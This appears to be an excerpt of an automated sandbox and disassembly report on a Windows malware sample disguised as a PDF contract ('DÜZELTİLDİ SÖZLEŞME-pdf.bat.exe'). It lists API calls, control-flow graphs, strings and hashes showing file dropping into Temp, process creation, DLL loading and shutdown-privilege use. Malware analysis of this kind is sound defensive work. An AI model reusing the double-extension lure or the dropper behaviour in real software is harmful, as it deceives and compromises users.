                              • GetFileAttributesW.KERNEL32(896,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                              • DeleteFileW.KERNEL32(896), ref: 004039BA
                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,896,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,896,?), ref: 00405B2D
                                • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,896,?), ref: 00405B3A
                                • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(76BF3420,00425F58,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                              • ExitProcess.KERNEL32 ref: 00403A69
                              • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,896,00000000), ref: 00403A70
                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                              • ExitProcess.KERNEL32 ref: 00403B13
                                • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                              • String ID: "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"$1033$896$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe$C:\Users\user\polaritets$C:\Users\user\polaritets$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                              • API String ID: 1813718867-2783420862
                              • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                              • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                              • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                              • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
                              Function 004056E5 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 171 4057eb-4057ee 152->171 172 4057cf-4057e9 SendMessageW * 2 152->172 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 157 4058eb-4058f5 155->157 158 4058cf-4058d5 155->158 156->155 162 4058f7-4058fd 157->162 163 40594b-40594f 157->163 160 405910-405919 call 404507 158->160 161 4058d7-4058e6 ShowWindow * 2 call 4044d5 158->161 175 40591e-405922 160->175 161->157 168 405925-405935 ShowWindow 162->168 169 4058ff-40590b call 404479 162->169 163->160 166 405951-405957 163->166 166->160 173 405959-40596c SendMessageW 166->173 176 405945-405946 call 404479 168->176 177 405937-405940 call 4055a6 168->177 169->160 178 4057f0-4057fc SendMessageW 171->178 179 4057fe-405815 call 4044a0 171->179 172->171 180 405972-40599d CreatePopupMenu call 40655e AppendMenuW 173->180 181 405a6e-405a70 173->181 176->163 177->176 178->179 190 405817-40582b ShowWindow 179->190 191 40584b-40586c GetDlgItem SendMessageW 179->191 188 4059b2-4059c7 TrackPopupMenu 180->188 189 40599f-4059af GetWindowRect 180->189 181->175 188->181 192 4059cd-4059e4 188->192 189->188 193 40583a 190->193 194 40582d-405838 ShowWindow 190->194 191->181 195 405872-40588a SendMessageW * 2 191->195 196 4059e9-405a04 SendMessageW 192->196 197 405840-405846 call 4044d5 193->197 194->197 195->181 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 00405743
                              • GetDlgItem.USER32(?,000003EE), ref: 00405752
                              • GetClientRect.USER32(?,?), ref: 0040578F
                              • GetSystemMetrics.USER32(00000002), ref: 00405796
                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                              • ShowWindow.USER32(?,00000008), ref: 00405832
                              • GetDlgItem.USER32(?,000003EC), ref: 00405853
                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                              • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                              • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                              • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                              • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                              • ShowWindow.USER32(00000000), ref: 004058DE
                              • ShowWindow.USER32(?,00000008), ref: 004058E3
                              • ShowWindow.USER32(00000008), ref: 0040592D
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                              • CreatePopupMenu.USER32 ref: 00405972
                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                              • GetWindowRect.USER32(?,?), ref: 004059A6
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                              • OpenClipboard.USER32(00000000), ref: 00405A07
                              • EmptyClipboard.USER32 ref: 00405A0D
                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                              • GlobalLock.KERNEL32(00000000), ref: 00405A23
                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                              • CloseClipboard.USER32 ref: 00405A68
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                              • String ID: {
                              • API String ID: 590372296-366298937
                              • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                              • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                              • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                              • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58
                              Function 701D1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 701D12BB: GlobalAlloc.KERNELBASE(00000040,?,701D12DB,?,701D137F,00000019,701D11CA,-000000A0), ref: 701D12C5
                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 701D1D2D
                              • lstrcpyW.KERNEL32(00000008,?), ref: 701D1D75
                              • lstrcpyW.KERNEL32(00000808,?), ref: 701D1D7F
                              • GlobalFree.KERNEL32(00000000), ref: 701D1D92
                              • GlobalFree.KERNEL32(?), ref: 701D1E74
                              • GlobalFree.KERNEL32(?), ref: 701D1E79
                              • GlobalFree.KERNEL32(?), ref: 701D1E7E
                              • GlobalFree.KERNEL32(00000000), ref: 701D2068
                              • lstrcpyW.KERNEL32(?,?), ref: 701D2222
                              • GetModuleHandleW.KERNEL32(00000008), ref: 701D22A1
                              • LoadLibraryW.KERNEL32(00000008), ref: 701D22B2
                              • GetProcAddress.KERNEL32(?,?), ref: 701D230C
                              • lstrlenW.KERNEL32(00000808), ref: 701D2326
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                              • String ID:
                              • API String ID: 245916457-0
                              • Opcode ID: fa7fd3ec9b533167caeb8f88519bd900a1edf1d6766de74808730d7b84f6db3e
                              • Instruction ID: 9a75f0eabf051973451a0ad8341db00be0deee833d5d37782761c94843c0bade
                              • Opcode Fuzzy Hash: fa7fd3ec9b533167caeb8f88519bd900a1edf1d6766de74808730d7b84f6db3e
                              • Instruction Fuzzy Hash: F522CD71D04605EFCB12CFB4C9842EEB7B5FB18315F22456EE1A6E2780D774AA81DB50
                              Function 00405C2D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 730 405c2d-405c53 call 405ef8 733 405c55-405c67 DeleteFileW 730->733 734 405c6c-405c73 730->734 735 405de9-405ded 733->735 736 405c75-405c77 734->736 737 405c86-405c96 call 406521 734->737 738 405d97-405d9c 736->738 739 405c7d-405c80 736->739 743 405ca5-405ca6 call 405e3c 737->743 744 405c98-405ca3 lstrcatW 737->744 738->735 742 405d9e-405da1 738->742 739->737 739->738 745 405da3-405da9 742->745 746 405dab-405db3 call 40687e 742->746 747 405cab-405caf 743->747 744->747 745->735 746->735 753 405db5-405dc9 call 405df0 call 405be5 746->753 751 405cb1-405cb9 747->751 752 405cbb-405cc1 lstrcatW 747->752 751->752 754 405cc6-405ce2 lstrlenW FindFirstFileW 751->754 752->754 770 405de1-405de4 call 4055a6 753->770 771 405dcb-405dce 753->771 755 405ce8-405cf0 754->755 756 405d8c-405d90 754->756 758 405d10-405d24 call 406521 755->758 759 405cf2-405cfa 755->759 756->738 761 405d92 756->761 772 405d26-405d2e 758->772 773 405d3b-405d46 call 405be5 758->773 762 405cfc-405d04 759->762 763 405d6f-405d7f FindNextFileW 759->763 761->738 762->758 766 405d06-405d0e 762->766 763->755 769 405d85-405d86 FindClose 763->769 766->758 766->763 769->756 770->735 771->745 774 405dd0-405ddf call 4055a6 call 4062e1 771->774 772->763 775 405d30-405d39 call 405c2d 772->775 783 405d67-405d6a call 4055a6 773->783 784 405d48-405d4b 773->784 774->735 775->763 783->763 787 405d4d-405d5d call 4055a6 call 4062e1 784->787 788 405d5f-405d65 784->788 787->763 788->763
                              APIs
                              • DeleteFileW.KERNELBASE(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405C56
                              • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405C9E
                              • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405CC1
                              • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405CC7
                              • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405CD7
                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                              • FindClose.KERNEL32(00000000), ref: 00405D86
                              Strings
                              • "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe", xrefs: 00405C36
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                              • \*.*, xrefs: 00405C98
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                              • API String ID: 2035342205-2479256138
                              • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                              • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                              • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                              • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                              Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 794 401774-401799 call 402dab call 405e67 799 4017a3-4017b5 call 406521 call 405df0 lstrcatW 794->799 800 40179b-4017a1 call 406521 794->800 805 4017ba-4017bb call 4067cf 799->805 800->805 809 4017c0-4017c4 805->809 810 4017c6-4017d0 call 40687e 809->810 811 4017f7-4017fa 809->811 819 4017e2-4017f4 810->819 820 4017d2-4017e0 CompareFileTime 810->820 812 401802-40181e call 406011 811->812 813 4017fc-4017fd call 405fec 811->813 821 401820-401823 812->821 822 401892-4018bb call 4055a6 call 4032b9 812->822 813->812 819->811 820->819 823 401874-40187e call 4055a6 821->823 824 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 821->824 836 4018c3-4018cf SetFileTime 822->836 837 4018bd-4018c1 822->837 834 401887-40188d 823->834 824->809 856 401869-40186a 824->856 839 402c38 834->839 838 4018d5-4018e0 CloseHandle 836->838 837->836 837->838 841 4018e6-4018e9 838->841 842 402c2f-402c32 838->842 843 402c3a-402c3e 839->843 845 4018eb-4018fc call 40655e lstrcatW 841->845 846 4018fe-401901 call 40655e 841->846 842->839 852 401906-40239d 845->852 846->852 857 4023a2-4023a7 852->857 858 40239d call 405b81 852->858 856->834 859 40186c-40186d 856->859 857->843 858->857 859->823
                              APIs
                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\polaritets,?,?,00000031), ref: 004017B5
                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\polaritets,?,?,00000031), ref: 004017DA
                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll), ref: 00405613
                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: C:\Users\user\AppData\Local\Temp\nsp919B.tmp$C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll$C:\Users\user\polaritets$Call
                              • API String ID: 1941528284-2788796068
                              • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                              • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                              • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                              • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
                              Function 0040687E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNELBASE(76BF3420,00425F58,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                              • FindClose.KERNEL32(00000000), ref: 00406895
                              Strings
                              • X_B, xrefs: 0040687F
                              • C:\Users\user\AppData\Local\Temp\nsp919B.tmp, xrefs: 0040687E
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID: C:\Users\user\AppData\Local\Temp\nsp919B.tmp$X_B
                              • API String ID: 2295610775-1361523723
                              • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                              • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                              • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                              • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                              Function 00406C3F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                              • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                              • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                              • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                              Function 00403FA1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
